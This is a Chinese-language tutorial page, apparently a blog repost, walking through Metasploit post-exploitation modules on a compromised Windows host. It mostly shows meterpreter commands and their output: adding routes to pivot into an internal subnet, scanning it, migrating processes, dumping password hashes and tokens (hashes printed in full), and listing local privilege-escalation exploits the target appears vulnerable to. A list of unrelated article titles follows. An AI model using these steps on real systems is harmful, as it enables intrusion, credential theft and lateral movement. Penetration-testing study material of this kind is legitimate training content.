Metasploit之Post Exploitation
来源:互联网 发布:oracle.sql.rowid 编辑:程序博客网 时间:2024/05/19 22:48
参考:
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/
autoroute
这个很重要啊!
The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to pivot deeper into a target network.
meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD[*] Running module against V-MAC-XP[*] Adding a route to 192.168.218.0/255.255.255.0...meterpreter > Background session 5? [y/N] y
之后就可以通过这个路由,来进一步渗透了。
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24RHOSTS => 192.168.218.0/24msf auxiliary(tcp) > set THREADS 50THREADS => 50msf auxiliary(tcp) > set PORTS 445PORTS => 445msf auxiliary(tcp) > run[*] Scanned 027 of 256 hosts (010% complete)[*] Scanned 052 of 256 hosts (020% complete)[*] Scanned 079 of 256 hosts (030% complete)[*] Scanned 103 of 256 hosts (040% complete)[*] Scanned 128 of 256 hosts (050% complete)[*] 192.168.218.136:445 - TCP OPEN[*] Scanned 154 of 256 hosts (060% complete)[*] Scanned 180 of 256 hosts (070% complete)[*] Scanned 210 of 256 hosts (082% complete)[*] Scanned 232 of 256 hosts (090% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(tcp) >
migrate
The “migrate” post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.
meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP[*] Current server process: svchost.exe (1092)[*] Migrating to explorer.exe...[*] Migrating into process ID 672[*] New server process: Explorer.EXE (672)meterpreter >
checkvm(检测是否在虚拟机中)
checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.
meterpreter > run post/windows/gather/checkvm [*] Checking if V-MAC-XP is a Virtual Machine .....[*] This is a VMware Virtual Machinemeterpreter >
credential_collector(收集机密信息)
harvests passwords hashes and tokens on the compromised host.
meterpreter > run post/windows/gather/credentials/credential_collector [*] Running module against V-MAC-XP[+] Collecting hashes... Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714 Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287[+] Collecting tokens... NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM NT AUTHORITY\ANONYMOUS LOGONmeterpreter >
dumplinks(导出存在的快捷方式)
The “dumplinks” module parses the .lnk files in a users Recent Documents which could be useful for further information gathering.Note that, as shown below, we first need to migrate into a user process prior to running the module.
meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP[*] Current server process: svchost.exe (1096)[*] Migrating to explorer.exe...[*] Migrating into process ID 1824[*] New server process: Explorer.EXE (1824)meterpreter > run post/windows/gather/dumplinks [*] Running module against V-MAC-XP[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.[*] No Recent Office files found for user Administrator. Nothing to do.meterpreter >
enum_applications(列举出安装的应用)
meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on WIN7-X86Installed Applications====================== Name Version ---- ------- Adobe Flash Player 25 ActiveX 25.0.0.148 Google Chrome 58.0.3029.81 Google Update Helper 1.3.33.5 Google Update Helper 1.3.25.11 Microsoft .NET Framework 4.6.1 4.6.01055 Microsoft .NET Framework 4.6.1 4.6.01055 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148 MySQL Connector Net 6.5.4 6.5.4 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661) 1 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233) 1 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2) 2 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037) 1 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693) 1 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025) 1 Update for Microsoft .NET Framework 4.6.1 (KB3210136) 1 Update for Microsoft .NET Framework 4.6.1 (KB4014553) 1 VMware Tools 10.1.6.5214329 XAMPP 1.8.1-0 1.8.1-0[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txtmeterpreter >
hashdump
The “hashdump” post module will dump the local users accounts on the compromised host using the registry.
meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::meterpreter >
usb_history
The “usb_history” module enumerates the USB drive history on the compromised system.
meterpreter > run post/windows/gather/usb_history [*] Running module against V-MAC-XP[*] C: Disk ea4cea4c E: STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} A: FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[*] Kingston DataTraveler 2.0 USB Device===================================================================================== Disk lpftLastWriteTime Thu Apr 21 13:09:42 -0600 2011 Volume lpftLastWriteTime Thu Apr 21 13:09:43 -0600 2011 Manufacturer (Standard disk drives) ParentIdPrefix 8&3a01dffe&0 ( E:) Class DiskDrive Driver {4D36E967-E325-11CE-BFC1-08002BE10318}\0001meterpreter >
local_exploit_suggester
查看还有哪些可以exploit的点?
msf > use post/multi/recon/local_exploit_suggester msf post(local_exploit_suggester) > show optionsModule options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 2 yes The session to run this module on. SHOWDESCRIPTION false yes Displays a detailed description for the available exploitsmsf post(local_exploit_suggester) > run[*] 192.168.101.129 - Collecting local exploits for x86/windows...[*] 192.168.101.129 - 31 exploit checks are being tried...[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.[*] Post module execution completed
- Metasploit之Post Exploitation
- Meterpreter Post-Exploitation分析
- WebApp exploitation with Arachni and Metasploit
- metasploit - post
- Command For Information Gathering Of Windows Post Exploitation
- Metasploit 之 webshell 提权
- metasploit之db_autopwn
- metasploit之db_nmap
- metasploit之hosts
- metasploit之db_autopwn实战
- metasploit之客户端渗透
- metasploit - [post/windows/manage/payload_inject] and [multi_meter_inject]
- ms14-068之metasploit应用
- Post-Exploitation in Windows: From Local Admin To Domain Admin (efficiently)
- Post-Exploitation in Windows: From Local Admin To Domain Admin (efficiently)
- Metasploit
- Metasploit
- Metasploit
- AlphaGo原理、应用与意义
- 2016年5月24日--2017年6月17日
- STM32的RCC和RTC有什么联系
- 解决maven jar包 miss更新无效的问题
- meterpreter之multi/handler
- Metasploit之Post Exploitation
- Metasploit笔记
- Java配置文件加载及读写
- 北京大学:选人用人问题突出,校办企业管理混乱
- Knn 手写识别
- fragment(防平板联系人界面,设置界面)、ViewPager+Fragment(防微信界面切换)
- [JS]让原生JS支持JQ CSS语句
- [JS]颜色渐变
- Intellij IDEA 问题整理